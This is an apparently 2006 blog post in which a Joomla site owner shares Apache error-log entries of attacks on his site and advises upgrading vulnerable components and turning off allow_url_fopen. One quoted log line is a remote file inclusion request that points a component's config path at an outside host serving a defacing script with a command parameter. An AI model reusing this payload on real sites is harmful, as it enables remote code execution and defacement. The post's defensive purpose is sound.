Hackers are using scripts to hack my page…
|I’ve already tried to reduce the surface of attack of my homepage by removing all un-needed components, modules, mambots but here is below what I’ve found into the log files…|
Hackers trying remote code injection
were found more than one time in apache error.log
[Thu Aug 17 17:29:05 2006] [error] [client 184.108.40.206] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0
Remember You should ASAP update the following components to their latest version:
- com_securityimages < 3.0.5 use at least a version > 3.0.6
- com_hashcash < 1.2.1 use at least a version > 1.2.2
- com_bayesiannaivefilter has been developed but never release as a component, but it is still available at #Joomla forge developer tree.
This attack is trying to execute a scripts, locate at http://recon.reschat.dk/images/gallery/tool25.txt. If You go there, You’ll find that th script is readable and contains a header.
Defacing Tool 2.0 by xxxxxx
Defacing Tool 2.0 by xxxxxxx" is a suite of php based scripts that allows the attacker to send commands to the server primarily with the intent to deface websites.
- For com_bayesiannaivefilter sorry guys but I do not have this plugins nor it has ever been released in the wild. com_securityimages or com_hashcash, just Upgrade!
- If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable. /etc/php.ini allow_url_fopen = Off
Hackers trying to access well known PHP files
each lines below at least more than 500 times…in 1 day
[Fri Aug 11 19:11:50 2006] [error] [client 220.127.116.11] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 18.104.22.168] user not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 22.214.171.124] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 126.96.36.199] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan
Hacker trying to access files that do not exist
- [Tue Aug 01 21:09:46 2006] [error] [client 188.8.131.52] user not found: /administrator/components/com_uhp/uhp_config.php
- [Tue Aug 01 20:43:03 2006] [error] [client 184.108.40.206] user not found: /administrator/components/com_colophon/admin.colophon.php
- [Mon Jul 31 20:11:25 2006] [error] [client 220.127.116.11] user not found: /administrator/components/com_mgm/help.mgm.php
which look like programs brute forcing with a set of rules some paths searching well known vulnerability
Some strange attempts…
[Tue Aug 01 18:49:11 2006] [error] [client 18.104.22.168] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 22.214.171.124] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 126.96.36.199] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 188.8.131.52] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 184.108.40.206] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 220.127.116.11] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com